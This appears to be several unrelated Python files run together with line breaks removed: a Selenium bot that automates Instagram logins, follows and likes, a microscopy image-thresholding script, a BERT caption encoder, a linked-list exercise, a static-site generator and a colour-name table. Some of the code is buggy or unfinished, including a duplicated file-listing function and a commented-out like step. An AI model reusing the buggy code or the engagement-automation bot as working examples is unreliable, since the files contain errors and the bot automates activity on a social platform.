from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains import os import time import configparser class InstagramBot: def __init__(self, username, password): """ Initialises Instagram Bot object. Args: username: The Instagram Username password: The Instagram Password Attributes: driver: Selenium.webdriver.chrome: Used to automate browser actions. """ self.username = username self.password = password self.driver = webdriver.Chrome("./chromedriver") self.base_url = "https://www.instagram.com" self.login() def login(self): self.driver.get("{}/accounts/login/".format(self.base_url)) time.sleep(0.2) self.driver.find_element_by_name("username").send_keys(self.username) self.driver.find_element_by_name("password").send_keys(self.password) self.driver.find_element_by_xpath("//div[contains(text(), 'Log In')]").click() time.sleep(1.2) def nav_user(self, user): self.driver.get("{}/{}/".format(self.base_url, user)) time.sleep(0.2) def follow_user(self, user): self.nav_user(user) follow_button = self.driver.find_element_by_xpath("//button[contains(text(), 'Follow')]") follow_button.click() def unfollow_user(self, user): self.nav_user(user) self.driver.find_element_by_xpath("//button[contains(text(), 'Following')]").click() def like_all_photos(self, user): self.nav_user(user) time.sleep(2) # action_chains = ActionChains(self.driver) # # action_chains.double_click(image).perform() # image = self.driver.find_element_by_css_selector("div article div div div div a div") images = self.driver.find_elements_by_css_selector("div article div div div div a:nth-child(1)") print(len(images)) for image in images: self.like_photo(image) time.sleep(1) def like_photo(self, image): image.click() time.sleep(1.5) # like_button = self.driver.find_element_by_xpath("/html/body/div[3]/div[2]/div/article/div[2]/section[1]/span[1]/button") # like_button.click() exit_button = self.driver.find_element_by_xpath("/html/body/div[3]/button[1]") exit_button.click() if __name__ == "__main__": config = './config.ini' cparser = configparser.ConfigParser() cparser.read(config) username = cparser["AUTH"]["User"] password = cparser["AUTH"]["Pass"] ig_bot = InstagramBot(username, password) ig_bot.like_all_photos("Undertaker")
# %% import os, sys import re import cv2 import pandas as pd import numpy as np import matplotlib.pyplot as plt from numpy import linspace, meshgrid from scipy.interpolate import griddata import matplotlib.image as mpimg import matplotlib.style import matplotlib as mpl mpl.style.use('default') from PIL import Image # Functions Section Begins ----------------------------------------------------- # def dircheck(targetpaths): """ dircheck checks the target folder and create the folder if it does not exist. targetdirlist: list of folderpath """ # print(type(targetpaths)) if isinstance(targetpaths, str): print(os.path.exists(targetpaths)) if not os.path.exists(targetpaths): os.makedirs(targetpaths) elif isinstance(targetpaths, list): for path in targetpaths: if not os.path.exists(path): os.makedirs(path) def listfiles(path, extension = None): filelist = [] fileabslist = [] for directory, dir_names, file_names in os.walk(path): # print(file_names) for file_name in file_names: if (not file_name.startswith('.')) & (file_name.endswith(extension)): filepath_tmp = os.path.join(directory, file_name) filelist.append(file_name) fileabslist.append(filepath_tmp) return {'filelist': filelist, 'fileabslist': fileabslist} def getprocessedimg(op_dir, pattern = r'(.+?).'): """ NOT USING getprocessedimg check the output folder and create a list of processed data pattern: the pattern re search """ processed_img = [] for (directory, dir_names, file_names) in os.walk(op_dir): for file_name in file_names: # print(file_name) # search the processed files by using re.search m = re.search(pattern, file_name) if m: # print(m) file_name_temp = m.group(1) processed_img.append(file_name_temp) # replace the duplicated filenames processed_img = list(set(processed_img)) return (processed_img) def listfiles(path, extension = None): filelist = [] fileabslist = [] for directory, dir_names, file_names in os.walk(path): # print(file_names) for file_name in file_names: if (not file_name.startswith('.')) & (file_name.endswith(extension)): filepath_tmp = os.path.join(directory, file_name + extension) filelist.append(file_name) fileabslist.append(filepath_tmp) return {'filelist': filelist, 'fileabslist': fileabslist} # Functions Section Ends ----------------------------------------------------- # # %% nchannels = 2 dir_check = [] # %% # input folder path = '/Volumes/LaCie_DataStorage/xiaochao_wei_STORM imaging/STORM_imaging' analysis_dir = 'analysis_20190308' spacialtestdir = 'spacial_test' intcsv_dir = 'spacialdata_local_pad_grid' intcsv_path = os.path.join(path, analysis_dir, spacialtestdir, intcsv_dir) print(intcsv_path) # output folder nnd_dir = 'nnd' intcsv_histo_dir = 'int_grid_histo' intcsv_histo_summary_dir = 'int_grid_histo_summary' intcsv_bw = 'int_grid_bw' intcsv_histo_path = os.path.join(path, analysis_dir, spacialtestdir, nnd_dir, intcsv_histo_dir) intcsv_histo_summary_path = os.path.join(path, analysis_dir, spacialtestdir, nnd_dir, intcsv_histo_summary_dir) for c in range(nchannels): dir_check.append(os.path.join(intcsv_histo_path, str(c+1))) dir_check.append(os.path.join(intcsv_bw, str(c+1))) dir_check.append(intcsv_histo_summary_path) dircheck(dir_check) # %% # Grouped by the channels and treatment ------------------------------------------ # filelist = {} filenamelist = listfiles(os.path.join(intcsv_path, '1'), '.tif')['filelist'] filedir = ['ip_filename', 'ip_path', 'op_hist', 'op_bw'] treatment = ['wildtype', 'knockout'] channel = list(range(2)) print(channel) # group the data by the treatment for c in channel: filelist[str(c+1)] = {} for group in treatment: filelist[str(c+1)][group] = {} # create list filelist_temp = [] for l in filenamelist: if group == 'wildtype': x = re.search('(.*)_w{1}[0-9]{1}_(.*)', l) else: x = re.search('(.*)_k{1}[0-9]{1}_(.*)', l) try: found = x.group(0) filelist_temp.append(found) except AttributeError: found = '' ip_filepath = [] op_hist_filepath = [] op_bw_filepath = [] for f in filelist_temp: filepath_tmp = os.path.join(intcsv_path, str(c+1), f) ip_filepath.append(filepath_tmp) filename_tmp_png = f.replace('.tif', '.png') op_hist_filepath_temp = os.path.join(intcsv_histo_path, str(c+1), filename_tmp_png) op_hist_filepath.append(op_hist_filepath_temp) op_bw_filepath_temp = os.path.join(intcsv_bw, str(c+2), filepath_tmp) op_bw_filepath.append(op_bw_filepath_temp) filelist[str(c+1)][group][filedir[0]] = filelist_temp filelist[str(c+1)][group][filedir[1]] = ip_filepath filelist[str(c+1)][group][filedir[2]] = op_hist_filepath filelist[str(c+1)][group][filedir[3]] = op_bw_filepath print(filelist) # %% threshold_c = {'1': 400, '2': 600,} # create binary by thresholding for c in channel: print('channel: {}'.format(c)) for group in treatment: for i in range(len(filelist[str(c+1)][group][filedir[0]])): images = [] # load data filepath = filelist[str(c+1)][group][filedir[1]][i] print(filepath) im = np.array(Image.open(filepath)) print(type(im)) # print array print(im) images.append(im) # visulization ---------------------------------------------- # ''' # brightness adjustment factor_up = 0.3 max_value = np.max(im) * factor_up print(max_value) im_scale = im * (((2**16-1) - 0) / (max_value - 0)) # assign oversaturated pixel to the max value np.putmask(im_scale, im_scale>(2**16-1), (2**16-1)) # conver to 16bit im_scale_16 = im_scale.astype("uint16") # show image cv2.imshow('image', im_scale_16) cv2.waitKey(0) cv2.destroyAllWindows() ''' # thresholding ---------------------------------------------- # ret,thresh1 = cv2.threshold(im, threshold_c[str(c+1)], (2**16-1), cv2.THRESH_BINARY) thresh1 = np.array(thresh1, dtype=np.uint8) plt.imshow(thresh1) images.append(thresh1) print(thresh1.dtype) print(np.max(thresh1)) ret, labels= cv2.connectedComponents(thresh1) images.append(labels) for i in range(len(images)): plt.subplot(2, 2, i+1) plt.imshow(images[i], 'gray') plt.xticks([]) plt.yticks([]) break break break
import copy import torch import torch.nn as nn import numpy as np import pytorch_transformers import utils.io as io class CapEncoderConstants(io.JsonSerializableClass): def __init__(self): super().__init__() self.model = 'BertModel' self.tokenizer = 'BertTokenizer' self.pretrained_weights = 'bert-base-uncased' self.max_len = 15 self.output_attentions = False class CapEncoder(nn.Module,io.WritableToFile): def __init__(self,const): super().__init__() self.const = copy.deepcopy(const) output_hidden_states = False if self.const.output_attentions is True: output_hidden_states = True self.model = getattr( pytorch_transformers, self.const.model).from_pretrained( self.const.pretrained_weights, output_hidden_states=output_hidden_states, output_attentions=self.const.output_attentions) self.tokenizer = getattr( pytorch_transformers, self.const.tokenizer).from_pretrained(self.const.pretrained_weights) @property def pad_token(self): return self.tokenizer.pad_token @property def cls_token(self): return self.tokenizer.cls_token @property def sep_token(self): return self.tokenizer.sep_token @property def pad_token_id(self): return self.tokenizer._convert_token_to_id(self.pad_token) @property def mask_token(self): return self.tokenizer.mask_token @property def mask_token_id(self): return self.tokenizer._convert_token_to_id(self.mask_token) def tokenize(self,caption): token_ids = self.tokenizer.encode(caption,add_special_tokens=True) tokens = [ self.tokenizer._convert_id_to_token(t_id) for t_id in token_ids] return token_ids, tokens def pad_list(self,list_to_pad,pad_item,max_len): L = len(list_to_pad) if L==max_len: padded_list = list_to_pad[:] elif L > max_len: padded_list = list_to_pad[:max_len] else: padding = [] for i in range(max_len-L): padding.append(pad_item) padded_list = list_to_pad + padding return padded_list def mask_batch(self,token_ids,mask_prob=0.1): B,L = token_ids.size() mask = torch.rand_like(token_ids.float()) < torch.tensor(mask_prob) mask = mask.long() token_ids = (1-mask)*token_ids + mask*torch.tensor(self.mask_token_id) return token_ids def tokenize_batch(self,captions,pad_tokens=True,max_len=None): batch_token_ids = [] batch_tokens = [] token_lens = [] max_token_len = 0 for cap in captions: token_ids, tokens = self.tokenize(cap) batch_token_ids.append(token_ids) batch_tokens.append(tokens) token_len = len(tokens) token_lens.append(token_len) max_token_len = max(max_token_len,token_len) if max_len is not None: max_token_len = min(max_len,max_token_len) if pad_tokens is True: for i in range(len(captions)): batch_token_ids[i] = self.pad_list( batch_token_ids[i], self.pad_token_id, max_token_len) batch_tokens[i] = self.pad_list( batch_tokens[i], self.pad_token, max_token_len) return batch_token_ids, batch_tokens, token_lens def get_token_mask(self,batch_tokens): B = len(batch_tokens) T = len(batch_tokens[0]) mask = np.zeros([B,T],dtype=np.float32) for b in range(B): tokens = batch_tokens[b] for t in range(T): if tokens[t] in [self.pad_token,self.sep_token,self.cls_token]: mask[b,t] = 1 return mask def select_noun_embed(self,embed,noun_token_ids): B,max_noun_tokens = noun_token_ids.size() D = embed.size(2) noun_embed = torch.zeros([B,max_noun_tokens,D],dtype=torch.float32).cuda() mask = torch.zeros([B,max_noun_tokens],dtype=torch.float32).cuda() for b in range(B): for j in range(max_noun_tokens): token_id = noun_token_ids[b,j] if token_id == -1: mask[b,j] = 1 continue noun_embed[b,j] = embed[b,token_id] return noun_embed, mask def select_noun_att(self,word_word_att,noun_token_ids): B,max_noun_tokens = noun_token_ids.size() noun_noun_att = torch.zeros( [B,max_noun_tokens,max_noun_tokens],dtype=torch.float32).cuda() for b in range(B): L= 0 token_ids = noun_token_ids[b] for i in range(max_noun_tokens): if token_ids[i] == -1: break else: L+=1 if L==0: continue idx = token_ids[:L].long() att = word_word_att[b,idx] att = att[:,idx] noun_noun_att[b,:L,:L] = att return noun_noun_att def forward(self,batch_token_ids): output = self.model(batch_token_ids) if self.const.output_attentions is True: embed = output[0] att = output[-1] return embed, att else: embed = output[0] return embed if __name__=='__main__': const = CapEncoderConstants() const.output_attentions = True cap_encoder = CapEncoder(const) caps = ['i am here for fun','what are you here for?'] token_ids, tokens, token_lens = cap_encoder.tokenize_batch(caps) token_ids = torch.LongTensor(token_ids) output = cap_encoder(token_ids) import pdb; pdb.set_trace()
# Singly-linked lists are already defined with this interface: # class ListNode(object): # def __init__(self, x): # self.value = x # self.next = None # def mergeTwoLinkedLists(l1, l2): if l1 == None and l2 == None: return None merged = ListNode(None) ret = merged # prev = merged.value while l1 != None or l2 != None: if l1 != None: if l2 == None and l1.next == None: merged.value = l1.value break if l2 != None: if l1 == None and l2.next == None: merged.value = l2.value break m1 = l2.value if l1 == None else l1.value m2 = l1.value if l2 == None else l2.value val = min(m2 if m1 == None else m1, m1 if m2 == None else m2) merged.next = ListNode(None) merged.value = val merged = merged.next if l1 != None and val >= l1.value: l1 = l1.next elif l2 != None and val >= l2.value: l2 = l2.next return ret
#!/usr/bin/env python """Static site generation for help.rerobots.net SCL <[email protected]> Copyright (C) 2018 rerobots, Inc. """ from datetime import datetime import sys from markdown.extensions.toc import TocExtension from markdown import markdown PREFIX="""<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> {OPENGRAPHBLOB} <title>{TITLE}</title> <link href="/extern/css/bootstrap.min.css" rel="stylesheet"> <link href="/extern/css/sticky-footer.css" rel="stylesheet"> <script src="/extern/js/jquery.min.js"></script> <script src="/extern/js/bootstrap.min.js"></script> <link rel="stylesheet" href="/css/main.css"> <link rel="stylesheet" href="/css/styles.css"> </head> <body> <a class="sr-only sr-only-focusable" href="#main-content">Skip to main content</a> <nav class="navbar navbar-default navbar-static-top"> <div class="container-fluid"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar-collapse-1" aria-expanded="false"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="https://rerobots.net/"> <span class="prefix-re">re</span>robots </a> </div> <div class="collapse navbar-collapse" id="navbar-collapse-1"> <ul class="nav navbar-nav navbar-right"> <li><a href="/index.html">introduction</a></li> <li><a href="/prelim.html">preliminaries</a></li> <li><a href="/guides.html">guides</a></li> <li><a href="/workspaces/">workspaces</a></li> <li><a href="/api.html">API</a></li> <li><a href="/references.html">references</a></li> </ul> </div> </div> </nav> <div class="container" id="main-content">""" SUFFIX="""</div> <footer class="footer"> <div class="container"><div class="row"> <div class="col-md-6 col-sm-6 text-muted"> Copyright &copy; 2021 rerobots, Inc.<br /> <a class="footer-left" href="{REPOURL}">Edit this page</a>; <a rel="license" href="https://github.com/rerobots/doc-help/" id="commons-license">free, open source</a>. </div> <div class="col-md-6 col-sm-6 text-muted"> <span id="update-date">updated {DATESTAMP}</span> <a href="https://rerobots.net/site/terms-of-service">terms of service</a> <a href="https://rerobots.net/contact">contact</a> </div> </div></div> </footer> {ENDBLOCK} </body> </html> """ def get_ogheader(blob, url=None): """extract Open Graph markup into a dict The OG header section is delimited by a line of only `---`. Note that the page title is not provided as Open Graph metadata if the image metadata is not specified. """ found = False ogheader = dict() for line in blob.split('\n'): if line == '---': found = True break if line.startswith('image: '): toks = line.split() assert len(toks) == 2 ogheader['image'] = toks[1] if not found: ogheader = dict() # Ignore any matches as false positives return ogheader if url is not None: assert 'url' not in ogheader ogheader['url'] = url for line in blob.split('\n'): if line.startswith('# '): ogheader['title'] = line[2:] return ogheader def create_ogblob(ogheader): """create <meta> tags from Open Graph dict if ogheader is empty dict, then return empty string. if ogheader has some values but not the minimum, then raise ValueError. if og:image is a path, not a URL of http or https scheme, then 'https://help.rerobots.net/' is prepended to it. """ if len(ogheader) == 0: return '' if not ('title' in ogheader and 'url' in ogheader and 'image' in ogheader): raise ValueError('some but not all required metadata provided for Open Graph') if not (ogheader['image'].startswith('http://') or ogheader['image'].startswith('https://')): ogheader['image'] = 'https://help.rerobots.net/' + ogheader['image'] blob = """ <meta property="og:type" content="website" /> <meta property="og:url" content="{URL}" /> <meta property="og:title" content="{TITLE}" /> <meta property="og:image" content="{IMAGE}" /> """.format(URL=ogheader['url'], TITLE=ogheader['title'], IMAGE=ogheader['image']) return blob def strip_header(blob): ind = blob.find('\n---\n') if ind == -1: return blob return blob[(ind+5):] def from_template(body, path, baseurl=None, repo_url=None): if repo_url is None: repo_url = 'https://github.com/rerobots/doc-help/blob/master/' + path if baseurl is None: baseurl = 'https://help.rerobots.net/' tstamp = datetime.utcnow().strftime('%Y-%m-%d') if path.endswith('.md'): path = path[:-2] + 'html' if path == 'index.html' or path.endswith('/index.html'): path = path[:-len('index.html')] url = baseurl + path ogheader = get_ogheader(body, url=url) if len(ogheader) > 0: body = strip_header(body) ogblob = create_ogblob(ogheader) title = ogheader.get('title', '') if len(title) > 0: title += ' - ' title += 'rerobots help' out = PREFIX.format(OPENGRAPHBLOB=ogblob, TITLE=title) out += markdown(body, output_format='html5', extensions=[TocExtension(), 'markdown.extensions.tables', 'markdown.extensions.codehilite']) if '$$' in body: endblock = '<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML"></script>' else: endblock = '' out += SUFFIX.format(DATESTAMP=tstamp, ENDBLOCK=endblock, REPOURL=repo_url) return out def main(argv): assert len(argv) == 2 or len(argv) == 3 path = argv[1] if len(argv) == 3: baseurl = argv[2] else: baseurl = None with open(path, 'rt') as fp: return from_template(fp.read(), path, baseurl) if __name__ == '__main__': print(main(sys.argv))
# -*- coding: utf-8 -*- """ colNamedColours.py Author: SMFSW Copyright (c) 2016-2021 SMFSW Description: HTMLrestricted & CSS color space reference & classes """ # TODO: add search nearest # TODO: ajouter la gestion des exceptions lorsque le nom de la couleur n'est pas trouvee from colHEX import ColHEX as cHEX class RefHTMLrestricted(object): """ HTMLrestricted reference dicts & methods """ @classmethod def searchref_HTMLrestricted(cls, typ='HEX', srch=''): """ Search in restricted HTML colors dict :param typ: returned type :param srch: item to search :return: item found returned as type passed in parameter """ try: for idx, (h, r, ms) in cls.ref_colHTMLrestricted.items(): if h == srch.upper() or r == srch or ms == srch or idx == srch.lower(): if typ == 'HEX': return h elif typ == 'RGB': return r elif typ == 'MSCode': return ms else: # if typ == 'Name': return idx except KeyError: pass lfields_HTMLrestricted = ['Name', 'HEX', 'RGB', 'MSCode'] ref_colHTMLrestricted = { # restricted set of HTML colors reference 'fuchsia': ('#FF00FF', (255, 0, 255), 16711935), 'purple' : ('#800080', (128, 0, 128), 8388736), 'blue' : ('#0000FF', (0, 0, 255), 16711680), 'navy' : ('#000080', (0, 0, 128), 8388608), 'aqua' : ('#00FFFF', (0, 255, 255), 16776960), 'teal' : ('#008080', (0, 128, 128), 8421376), 'lime' : ('#00FF00', (0, 255, 0), 65280), 'green' : ('#008000', (0, 128, 0), 32768), 'yellow' : ('#FFFF00', (255, 255, 0), 65535), 'olive' : ('#808000', (128, 128, 0), 32896), 'red' : ('#FF0000', (255, 0, 0), 255), 'maroon' : ('#800000', (128, 0, 0), 128), 'white' : ('#FFFFFF', (255, 255, 255), 16777215), 'silver' : ('#C0C0C0', (192, 192, 192), 12632256), 'gray' : ('#808080', (128, 128, 128), 8421504), 'black' : ('#000000', (0, 0, 0), 0) } class RefCSS(object): """ CSS reference dicts & methods """ @classmethod def searchref_CSS(cls, typ='HEX', srch=''): """ Search in CSS color dict :param typ: returned type :param srch: item to search :return: item found returned as type passed in parameter """ try: for idx, (h, r, ms) in cls.ref_colCSS.items(): if h == srch.upper() or r == srch or ms == srch or idx == srch.lower(): if typ == 'HEX': return h elif typ == 'RGB': return r elif typ == 'MSCode': return ms else: # if typ == 'Name': return idx except KeyError: pass lfields_CSS = ['Name', 'HEX', 'RGB', 'MSCode'] ref_colCSS = { # CSS colors reference # Colour Name, Hex, R, G, B, Microsoft Access code nr 'lightpink' : ('#FFB6C1', (255, 182, 193), 12695295), 'pink' : ('#FFC0CB', (255, 192, 203), 13353215), 'crimson' : ('#DC143C', (220, 20, 60), 3937500), 'lavenderblush' : ('#FFF0F5', (255, 240, 245), 16118015), 'palevioletred' : ('#DB7093', (219, 112, 147), 9662683), 'hotpink' : ('#FF69B4', (255, 105, 180), 11823615), 'deeppink' : ('#FF1493', (255, 20, 147), 9639167), 'mediumvioletred' : ('#C71585', (199, 21, 133), 8721863), 'orchid' : ('#DA70D6', (218, 112, 214), 14053594), 'thistle' : ('#D8BFD8', (216, 191, 216), 14204888), 'plum' : ('#DDA0DD', (221, 160, 221), 14524637), 'violet' : ('#EE82EE', (238, 130, 238), 15631086), 'fuchsia' : ('#FF00FF', (255, 0, 255), 16711935), 'darkmagenta' : ('#8B008B', (139, 0, 139), 9109643), 'purple' : ('#800080', (128, 0, 128), 8388736), 'mediumorchid' : ('#BA55D3', (186, 85, 211), 13850042), 'darkviolet' : ('#9400D3', (148, 0, 211), 13828244), 'darkorchid' : ('#9932CC', (153, 50, 204), 13382297), 'indigo' : ('#4B0082', (75, 0, 130), 8519755), 'blueviolet' : ('#8A2BE2', (138, 43, 226), 14822282), 'mediumpurple' : ('#9370DB', (147, 112, 219), 14381203), 'mediumslateblue' : ('#7B68EE', (123, 104, 238), 15624315), 'slateblue' : ('#6A5ACD', (106, 90, 205), 13458026), 'darkslateblue' : ('#483D8B', (72, 61, 139), 9125192), 'ghostwhite' : ('#F8F8FF', (248, 248, 255), 16775416), 'lavender' : ('#E6E6FA', (230, 230, 250), 16443110), 'blue' : ('#0000FF', (0, 0, 255), 16711680), 'mediumblue' : ('#0000CD', (0, 0, 205), 13434880), 'darkblue' : ('#00008B', (0, 0, 139), 9109504), 'navy' : ('#000080', (0, 0, 128), 8388608), 'midnightblue' : ('#191970', (25, 25, 112), 7346457), 'royalblue' : ('#4169E1', (65, 105, 225), 14772545), 'cornflowerblue' : ('#6495ED', (100, 149, 237), 15570276), 'lightsteelblue' : ('#B0C4DE', (176, 196, 222), 14599344), 'lightslategray' : ('#778899', (119, 136, 153), 10061943), 'slategray' : ('#708090', (112, 128, 144), 9470064), 'dodgerblue' : ('#1E90FF', (30, 144, 255), 16748574), 'aliceblue' : ('#F0F8FF', (240, 248, 255), 16775408), 'steelblue' : ('#4682B4', (70, 130, 180), 11829830), 'lightskyblue' : ('#87CEFA', (135, 206, 250), 16436871), 'skyblue' : ('#87CEEB', (135, 206, 235), 15453831), 'deepskyblue' : ('#00BFFF', (0, 191, 255), 16760576), 'lightblue' : ('#ADD8E6', (173, 216, 230), 15128749), 'powderblue' : ('#B0E0E6', (176, 224, 230), 15130800), 'cadetblue' : ('#5F9EA0', (95, 158, 160), 10526303), 'darkturquoise' : ('#00CED1', (0, 206, 209), 13749760), 'azure' : ('#F0FFFF', (240, 255, 255), 16777200), 'lightcyan' : ('#E0FFFF', (224, 255, 255), 16777184), 'paleturquoise' : ('#AFEEEE', (175, 238, 238), 15658671), 'aqua' : ('#00FFFF', (0, 255, 255), 16776960), 'darkcyan' : ('#008B8B', (0, 139, 139), 9145088), 'teal' : ('#008080', (0, 128, 128), 8421376), 'darkslategray' : ('#2F4F4F', (47, 79, 79), 5197615), 'mediumturquoise' : ('#48D1CC', (72, 209, 204), 13422920), 'lightseagreen' : ('#20B2AA', (32, 178, 170), 11186720), 'turquoise' : ('#40E0D0', (64, 224, 208), 13688896), 'aquamarine' : ('#7FFFD4', (127, 255, 212), 13959039), 'mediumaquamarine' : ('#66CDAA', (102, 205, 170), 11193702), 'mediumspringgreen' : ('#00FA9A', (0, 250, 154), 10156544), 'mintcream' : ('#F5FFFA', (245, 255, 250), 16449525), 'springgreen' : ('#00FF7F', (0, 255, 127), 8388352), 'mediumseagreen' : ('#3CB371', (60, 179, 113), 7451452), 'seagreen' : ('#2E8B57', (46, 139, 87), 5737262), 'honeydew' : ('#F0FFF0', (240, 255, 240), 15794160), 'darkseagreen' : ('#8FBC8F', (143, 188, 143), 9419919), 'palegreen' : ('#98FB98', (152, 251, 152), 10025880), 'lightgreen' : ('#90EE90', (144, 238, 144), 9498256), 'limegreen' : ('#32CD32', (50, 205, 50), 3329330), 'lime' : ('#00FF00', (0, 255, 0), 65280), 'forestgreen' : ('#228B22', (34, 139, 34), 2263842), 'green' : ('#008000', (0, 128, 0), 32768), 'darkgreen' : ('#006400', (0, 100, 0), 25600), 'lawngreen' : ('#7CFC00', (124, 252, 0), 64636), 'chartreuse' : ('#7FFF00', (127, 255, 0), 65407), 'greenyellow' : ('#ADFF2F', (173, 255, 47), 3145645), 'darkolivegreen' : ('#556B2F', (85, 107, 47), 3107669), 'yellowgreen' : ('#9ACD32', (154, 205, 50), 3329434), 'olivedrab' : ('#6B8E23', (107, 142, 35), 2330219), 'ivory' : ('#FFFFF0', (255, 255, 240), 15794175), 'beige' : ('#F5F5DC', (245, 245, 220), 14480885), 'lightyellow' : ('#FFFFE0', (255, 255, 224), 14745599), 'lightgoldenrodyellow': ('#FAFAD2', (250, 250, 210), 13826810), 'yellow' : ('#FFFF00', (255, 255, 0), 65535), 'olive' : ('#808000', (128, 128, 0), 32896), 'darkkhaki' : ('#BDB76B', (189, 183, 107), 7059389), 'palegoldenrod' : ('#EEE8AA', (238, 232, 170), 11200750), 'lemonchiffon' : ('#FFFACD', (255, 250, 205), 13499135), 'khaki' : ('#F0E68C', (240, 230, 140), 9234160), 'gold' : ('#FFD700', (255, 215, 0), 55295), 'cornsilk' : ('#FFF8DC', (255, 248, 220), 14481663), 'goldenrod' : ('#DAA520', (218, 165, 32), 2139610), 'darkgoldenrod' : ('#B8860B', (184, 134, 11), 755384), 'floralwhite' : ('#FFFAF0', (255, 250, 240), 15792895), 'oldlace' : ('#FDF5E6', (253, 245, 230), 15136253), 'wheat' : ('#F5DEB3', (245, 222, 179), 11788021), 'orange' : ('#FFA500', (255, 165, 0), 42495), 'moccasin' : ('#FFE4B5', (255, 228, 181), 11920639), 'papayawhip' : ('#FFEFD5', (255, 239, 213), 14020607), 'blanchedalmond' : ('#FFEBCD', (255, 235, 205), 13495295), 'navajowhite' : ('#FFDEAD', (255, 222, 173), 11394815), 'antiquewhite' : ('#FAEBD7', (250, 235, 215), 14150650), 'tan' : ('#D2B48C', (210, 180, 140), 9221330), 'burlywood' : ('#DEB887', (222, 184, 135), 8894686), 'darkorange' : ('#FF8C00', (255, 140, 0), 36095), 'bisque' : ('#FFE4C4', (255, 228, 196), 12903679), 'linen' : ('#FAF0E6', (250, 240, 230), 15134970), 'peru' : ('#CD853F', (205, 133, 63), 4163021), 'peachpuff' : ('#FFDAB9', (255, 218, 185), 12180223), 'sandybrown' : ('#F4A460', (244, 164, 96), 6333684), 'chocolate' : ('#D2691E', (210, 105, 30), 1993170), 'saddlebrown' : ('#8B4513', (139, 69, 19), 1262987), 'seashell' : ('#FFF5EE', (255, 245, 238), 15660543), 'sienna' : ('#A0522D', (160, 82, 45), 2970272), 'lightsalmon' : ('#FFA07A', (255, 160, 122), 8036607), 'coral' : ('#FF7F50', (255, 127, 80), 5275647), 'orangered' : ('#FF4500', (255, 69, 0), 17919), 'darksalmon' : ('#E9967A', (233, 150, 122), 8034025), 'tomato' : ('#FF6347', (255, 99, 71), 4678655), 'salmon' : ('#FA8072', (250, 128, 114), 7504122), 'mistyrose' : ('#FFE4E1', (255, 228, 225), 14804223), 'lightcoral' : ('#F08080', (240, 128, 128), 8421616), 'snow' : ('#FFFAFA', (255, 250, 250), 16448255), 'rosybrown' : ('#BC8F8F', (188, 143, 143), 9408444), 'indianred' : ('#CD5C5C', (205, 92, 92), 6053069), 'red' : ('#FF0000', (255, 0, 0), 255), 'brown' : ('#A52A2A', (165, 42, 42), 2763429), 'firebrick' : ('#B22222', (178, 34, 34), 2237106), 'darkred' : ('#8B0000', (139, 0, 0), 139), 'maroon' : ('#800000', (128, 0, 0), 128), 'white' : ('#FFFFFF', (255, 255, 255), 16777215), 'whitesmoke' : ('#F5F5F5', (245, 245, 245), 16119285), 'gainsboro' : ('#DCDCDC', (220, 220, 220), 14474460), 'lightgrey' : ('#D3D3D3', (211, 211, 211), 13882323), 'silver' : ('#C0C0C0', (192, 192, 192), 12632256), 'darkgray' : ('#A9A9A9', (169, 169, 169), 11119017), 'gray' : ('#808080', (128, 128, 128), 8421504), 'dimgray' : ('#696969', (105, 105, 105), 6908265), 'black' : ('#000000', (0, 0, 0), 0) } class ColHTMLrestricted(RefHTMLrestricted, cHEX): """ restricted HTML set of colors class Inherits from colHEX & RefHTMLrestricted """ # TODO: recreate method to get data in dict (from self) def __init__(self, name='black', *args, **kwargs): self.dfields_HTMLrestricted = dict(zip(range(len(self.lfields_HTMLrestricted)), self.lfields_HTMLrestricted)) # make dict from fields list self.refs_HTMLrestricted = lambda: [vars(self)[var] for var in self.lfields_HTMLrestricted] # make list from color space members self.getHEX_from_Name = lambda n: self.ref_colHTMLrestricted.get(n)[0] self.getRGB_from_Name = lambda n: self.ref_colHTMLrestricted.get(n)[1] self.getMSCode_from_Name = lambda n: self.ref_colHTMLrestricted.get(n)[2] tmp = self.searchref_HTMLrestricted('Name', name) if name is None: tmp = 'black' cHEX.__init__(self, self.get('HEX', tmp), *args, **kwargs) self.type = 'HTMLrestricted' # can be used instead of isinstance on an object def get(self, typ='HEX', srch='self'): """ get data from restricted HTML colors dict :param typ: row in dict (from lfields_HTMLrestricted) :param srch: to search in dict keys :return: either string ot tuple of the type passed as parameter """ if srch == 'self': srch = self.HEX if not isinstance(typ, str): pass elif typ == 'Name': return self.HEX else: try: srch = srch.lower() if srch in self.ref_colHTMLrestricted: tup = self.ref_colHTMLrestricted.get(srch) for idx, val in enumerate(self.lfields_HTMLrestricted): if val == typ: return tup[idx - 1] except KeyError: print("Key not found!!!") pass class ColCSS(RefCSS, cHEX): """ CSS HTML set of colors class Inherits from colHEX & RefCSS """ # TODO: recreate method to get data in dict (from self) def __init__(self, name='black', *args, **kwargs): self.dfields_CSS = dict(zip(range(len(self.lfields_CSS)), self.lfields_CSS)) # make dict from fields list self.refs_CSS = lambda: [vars(self)[var] for var in self.lfields_CSS] # make list from color space members self.getHEX_from_Name = lambda n: self.ref_colCSS.get(n)[0] self.getRGB_from_Name = lambda n: self.ref_colCSS.get(n)[1] self.getMSCode_from_Name = lambda n: self.ref_colCSS.get(n)[2] tmp = self.searchref_CSS('Name', name) if name is None: tmp = 'black' cHEX.__init__(self, self.get('HEX', tmp), *args, **kwargs) self.type = 'CSS' # can be used instead of isinstance on an object def get(self, typ='HEX', srch='self'): """ get data from CSS colors dict :param typ: row in dict (from lfields_CSS) :param srch: to search in dict keys :return: either string ot tuple of the type passed as parameter """ if srch == 'self': srch = self.HEX if not isinstance(typ, str): pass elif typ == 'Name': return self.HEX else: try: srch = srch.lower() if srch in self.ref_colCSS: tup = self.ref_colCSS.get(srch) for idx, val in enumerate(self.lfields_CSS): if val == typ: return tup[idx - 1] except KeyError: print("Key not found!!!") pass if __name__ == "__main__": # TODO: recreate method to get data in dict (from self) col_HTMr = ColHTMLrestricted('olive') print(col_HTMr.searchref_HTMLrestricted()) # TODO: what's the point if called without param? col_CSS = ColCSS('thistle') print(col_CSS.searchref_CSS()) # 